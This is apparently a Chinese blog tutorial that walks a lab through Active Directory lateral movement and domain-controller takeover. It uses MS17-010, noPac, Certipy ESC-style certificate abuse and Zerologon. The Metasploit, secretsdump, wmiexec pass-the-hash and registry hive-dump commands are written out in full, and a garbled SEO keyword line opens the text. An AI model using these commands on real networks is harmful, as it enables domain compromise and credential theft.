域名被墙检测,网站建设阿华seo,免费网站可以做淘宝客吗,模版 网站需要多少钱案例一#xff1a;横向移动-系统漏洞-CVE-2017-0146
这个漏洞就是大家熟悉的ms17-010#xff0c;这里主要学习cs发送到msf#xff0c;并且msf正向连接后续
原因是cs只能支持漏洞检测#xff0c;而msf上有很多exp可以利用
注意msf不能使用4.5版本的有bug
这里还是反弹权…案例一横向移动-系统漏洞-CVE-2017-0146
这个漏洞就是大家熟悉的ms17-010这里主要学习cs发送到msf并且msf正向连接后续
原因是cs只能支持漏洞检测而msf上有很多exp可以利用
注意msf不能使用4.5版本的有bug
这里还是反弹权限然后提权到system 设置监听器 msf开启监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 0.0.0.0 set lport 8888 exploit 转发msf上 转发到刚才的会话上 msf成功上线 这是3网段的主机所以可以连接到3网段所有主机但是需要设置路由 run autoroute -p //查看当前路由表 run post/multi/manage/autoroute //添加当前路由表 会话放入后台 这里利用ms17-010的时候反向没有办法上线的因为内网的主机不出网只有正向去连接他
首先先检测是否有该漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.3.21-32 //设置扫描目标段 set threads 5 //设置扫描线程数 run 这里我的域控环境网段不是连续的就扫描一个dc 可以利用这里因为内网是不出网的所以需要借助已经拿到的机器去控制目标主机正向连接
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标或者范围
run
本来是希望去控制域控主机的但是域控主机似乎做了某种限制这里我控制的是sqladmin 成功 msf正向连接中设置了路由就可以甚至不用上传木马不知道是不是msf17-010的溢出不用
案例二: 横向移动-域控提权-CVE-2014-6324
在这篇文章里面复现过
第130天内网安全-横向移动PTH哈希PTT 票据PTK密匙Kerberos密码喷射-CSDN博客
案例三横向移动-域控提权-CVE-2021-42287 前提条件一个域内普通账号 影响版本Windows基本全系列 这篇文章也复现过这里还有不同的工具
第106天权限提升-WIN 系统AD域控NetLogonADCSPACKDCCVE 漏洞_windows 提权漏洞补丁 ad域-CSDN博客
方法一
同样先上线代理转发 项目下载地址https://github.com/safebuffer/sam-the-admin python3 sam_the_admin.py 域名/域控主机账号:密码 -dc-ip 域控ip -shell python3 sam_the_admin.py 0day.org/administrator:123.com -dc-ip 192.168.3.142 -shell 查看获得的权限啊
方法二
nopac下载地址: https://github.com/cube0x0/noPac
把这个文件导入到visual studio中 编译生成文件 在这个目录下会生成exe文件 这里按理说应该设置代理在本地运行我是linux系统没办法设置直接上传本地运行
出现下面的提示代表有漏洞 noPac.exe scan -domain 0day.org -user jack -pass admin!#45 生成票据 noPac.exe -domain 0day.org -user jack -pass admin!#45 /dc 域控名 /mAccount 乱输一个用户名 -mPassword 乱输一个密码 /service 乱输一个服务 /ptt noPac -domain 0day.org -user jack -pass admin!#45 /dc owa2010sp3.0day.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt PsExec \\owa2010cn-god.god.org cmd 现在查看票据里面就有一个administrator的票据 利用工具建立连接 psexec.exe \\域控主机名 cmd 案例四WIN-域控提权-CVE-2022-26923
利用条件 一个域控内普通的账号密码 并且域控内有ca证书服务器 dnshostname不唯一 查看域内是否有证书服务器
certutil -config - -ping没有的情况 如果有证书服务器 资源下载地址GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
安装必要的插件 python3 setup.py install 首先先申请一个证书 certipy req ip/域用户名:密码域控计算机名 -target-ip 域控ip -ca CA服务器名 -template User -debug certipy req 192.168.3.142/jack:admin!#45OWA2010SP3.0day.org -target-ip 192.168.3.142 -ca 0day-OWA2010SP3-CA -template User -debug 检测证书 certipy auth -pfx jack.pfx -dc-ip 192.168.3.142 -debug 添加计算机账号
项目地址GitCode - 全球开发者的开源社区,开源代码托管平台 python3 bloodyAD.py -d 域控名 -u 普通用户名 -p 普通用户密码 --host 域控ip addComputer 计算机名 计算机密码 python3 bloodyAD.py -d 0day.org -u jack -p admin!#45 --host 192.168.3.142 addComputer pwnmachine CVEPassword1234* 域控计算机中这台主机被成功添加了进去 这一步是需要将计算机名更新为与域控一样的名字在这一步实验的过程中发现无法实现原因是由于dnshostname在这个环境当中是唯一的 python3 bloodyAD.py -d 0day.org -u jack -p admin!#45 --host 192.168.3.142 setAttribute CNpwnmachine,CNComputers,DC0day,DCorg dNSHostName [OWA2010SP3.0day.org] 后续操作先看这篇文章把
第106天权限提升-WIN 系统AD域控NetLogonADCSPACKDCCVE 漏洞_ad域控提权-CSDN博客
案例五WIN-域控提权-CVE-2020-1472
影响范围以及利用条件 CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞 影响 Windows Server 2008R2 至 Windows Server 2019 的多个版本系统 只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 . 该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows 资源下载地址 POChttps://github.com/SecuraBV/CVE-2020-1472 EXPhttps://github.com/dirkjanm/CVE-2020-1472 Impackethttps://github.com/fortra/impacket 获取计算机名这里这条命令设置代理后好像识别不出来这条命令无法执行我只能设置在一个网段运行。。。但是也有别的办法获取 nbtscan -v -h 192.168.3.21 可以用这种方式获取计算机 测试漏洞是否能够正常使用 python3 zerologon_tester.py OWA2010SP3 192.168.3.142 因为设置代理的话这里是一个一个数据包进行发送的所以会比较慢。 清空密码凭证 python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142 利用impack套件导出hash python3 secretsdump.py 0day.org/OWA2010SP3\$192.168.3.142 -no-pass 导出hash上面的admin是域控本地的admin而下面的是域控内的 利用套件里面的wmiexec进行连接 python3 wmiexec.py Administrator192.168.3.142 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942 这中方式一般不要使用会导致内网崩溃用完记得恢复hash
重置hash的方式https://zhuanlan.zhihu.com/p/627855713
运行这三条命令
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save 生成三个文件 这三个文件保存在本地利用套件里面的secretdump文件恢复 但是他这个只能是在系统本地运行系统不一定有python环境啊
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL 利用powershell执行这条命令
